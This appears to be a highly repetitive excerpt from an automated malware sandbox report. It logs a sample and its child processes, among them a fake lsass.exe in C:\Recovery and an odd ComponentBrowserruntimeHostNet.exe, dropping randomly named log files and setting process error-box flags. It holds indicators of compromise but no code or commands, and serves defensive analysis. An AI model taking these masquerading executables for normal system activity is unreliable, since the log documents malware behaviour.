                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\gvHJzrMq.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\icHKrlAV.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\CmKYhHkf.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\tIBixNUy.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\ryfhxvpx.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\LkfFbrxk.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\phNJAZcc.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\XVlEhDHN.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\MhHNxrMf.logJump to dropped file
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
